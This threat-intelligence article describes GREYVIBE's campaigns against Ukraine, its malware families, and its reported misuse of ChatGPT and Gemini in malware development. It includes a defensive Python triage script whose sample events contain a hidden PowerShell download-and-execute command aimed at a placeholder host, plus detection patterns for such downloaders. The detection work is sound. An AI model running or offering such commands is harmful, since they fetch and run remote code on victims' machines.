A newly identified cyber threat group known as GREYVIBE has been linked to an ongoing cyber espionage campaign targeting Ukraine and organizations connected to the country since at least August 2025. According to cybersecurity company WithSecure, the threat actor is believed to be a Russian-speaking group operating broadly within the Russian time zone. Researchers assess that the activity aligns with Kremlin state interests, particularly intelligence-gathering efforts associated with the ongoing Russia-Ukraine conflict. The campaign has reportedly targeted a broad range of victims, including military institutions, government bodies, civilian networks, and business organizations, signaling a wide operational scope.
WithSecure researchers revealed that GREYVIBE has relied on several attack methods to infiltrate systems and deliver malware. These methods include spear-phishing emails, fake CAPTCHA pages, and deceptive Ukrainian-themed adult club websites designed to lure victims into downloading malicious software. One of the key attack chains, known as PhantomMail, distributes harmful ZIP and RAR files hosted on cloud platforms such as Google Drive and 4sync through phishing emails. Once downloaded, these archives launch JavaScript-based loaders that open decoy documents while secretly deploying PhantomRelay, a PowerShell-based remote access trojan capable of profiling infected systems and executing commands. Another technique, called PhantomClick, uses fake CAPTCHA pages hosted on domains disguised as legitimate services such as Zoom and LAPAS to manipulate users into manually running commands that trigger malware infections.
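Both delivery chains above leave a recognisable process-creation trail on an endpoint: PhantomMail runs a JavaScript loader out of an extracted archive and hands off to PowerShell, and PhantomClick ends with the user typing a downloader command by hand. The triage script below is an added example written for this article, not code from WithSecure or from the GREYVIBE campaign. It assumes Sysmon Event ID 1 style fields (Image, ParentImage, CommandLine) and assumes that a command pasted into the Windows Run dialog shows up with explorer.exe as its parent; the article does not state that detail. The events it scans are constructed, and the hostname in them is a placeholder.

```python
"""Heuristic triage of process-creation events for the two GREYVIBE
delivery patterns described above.  Sample events are constructed for
this example; field names follow the Sysmon Event ID 1 layout."""
import re
from typing import Optional

# Generic process names used by the heuristics (assumption: the article
# names no specific binaries, these are the usual Windows script hosts
# and command interpreters).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Flags or phrases that suggest a shell is acting as a hidden downloader:
# hidden window, encoded command, Invoke-Expression, remote fetch.
SUSPICIOUS_ARGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biex\b|"
    r"invoke-expression|downloadstring|https?://)", re.I)

# A .js/.jse file executed from a Temp or Downloads folder, where an
# archive opened from a mail attachment would typically be extracted.
JS_FROM_USER_DIR = re.compile(r'\\(temp|downloads)\\[^\s"]*\.jse?\b', re.I)


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Return a verdict string for a suspicious event, or None if benign."""
    image = basename(event["Image"])
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    if image in SCRIPT_HOSTS and JS_FROM_USER_DIR.search(cmd):
        return "script host running JS from Temp/Downloads (PhantomMail-style loader)"
    if parent in SCRIPT_HOSTS and image in SHELLS:
        return "shell spawned by a script host (PhantomMail-style loader to PowerShell)"
    if parent == "explorer.exe" and image in SHELLS and SUSPICIOUS_ARGS.search(cmd):
        return "user-launched shell with hidden/download flags (PhantomClick-style)"
    return None


def triage(events) -> list:
    """Return (ProcessId, verdict) for every event that trips a heuristic."""
    return [(e["ProcessId"], v) for e in events if (v := classify(e)) is not None]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events: 101 and 105 are ordinary administrator activity,
# 102/103 mimic the archive -> JS loader -> PowerShell chain, 104 mimics a
# command pasted from a fake CAPTCHA page.  The URL host is a placeholder.
SAMPLE_EVENTS = [
    {"ProcessId": 101, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},
    {"ProcessId": 102, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\Rar$DIa0001\Invoice.js"'},
    {"ProcessId": 103, "Image": PS, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -w hidden -enc SQBFAFgA"},
    {"ProcessId": 104, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm http://captcha.example.invalid/v)"'},
    {"ProcessId": 105, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -File build.ps1"},
]

if __name__ == "__main__":
    for pid, verdict in triage(SAMPLE_EVENTS):
        print(f"PID {pid}: {verdict}")
```

The three rules are deliberately narrow so that an administrator opening a PowerShell console (event 101) or a build script run from cmd.exe (event 105) is not flagged; in practice the parent-process and command-line fields would be fed in from Sysmon or an EDR export rather than the inline list.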
The group has also used more deceptive social engineering tactics under operations identified as PrincessClub, DroneLink, and Nebo. PrincessClub reportedly involved fraudulent Ukrainian adult club websites that distributed Android spyware known as FallSpy and Windows malware variants including PhantomRelayV1 and LegionRelay. Updated versions of these fake websites also featured WebRTC-based live call functionality designed to capture victims’ audio and video. Researchers said FallSpy can extract sensitive information from compromised Android devices, while LegionRelay is capable of file theft, screenshot capture, browser credential harvesting, messaging app data extraction from Telegram and WhatsApp, and setting up remote desktop access. DroneLink reportedly used websites impersonating charitable organizations supporting the Armed Forces of Ukraine to deploy LegionRelay and WireGuard tools. Nebo, another operation linked to GREYVIBE, used a FallSpy sample disguised as a Russian-language login interface, likely intended to deceive Ukrainian military personnel.
Researchers also identified evidence suggesting GREYVIBE has incorporated generative artificial intelligence and large language models into its operations. Platforms such as Ideogram AI, OpenAI ChatGPT, and Google Gemini were reportedly used to create images, assist malware development, generate obfuscation techniques, support backend infrastructure, and automate post-compromise commands. According to WithSecure, this use of AI may have enabled the group to compensate for technical limitations, accelerate malware development, and reduce dependency on previously identified tools that could reveal attribution patterns. However, researchers noted that AI-generated coding flaws in LegionRelay also exposed portions of the malware’s backend functionality, indicating operational mistakes uncommon among highly sophisticated state-backed groups.
WithSecure further stated that GREYVIBE appears to maintain links with the wider Russian cybercrime ecosystem. Researchers highlighted the suspected use of an ISO builder associated with TrickBot-linked activity and UAC-0098, alongside malware overlaps found in separate cybercrime campaigns between 2025 and 2026. Additional indicators included the upload of early malware samples to VirusTotal, the use of internet slang in development naming conventions, and the limited deployment of XMRig cryptocurrency mining software on compromised systems. While the exact relationship between GREYVIBE and Russian state structures remains uncertain, researchers assess that the group operates in a space between cybercrime and state-affiliated activity, making attribution increasingly difficult.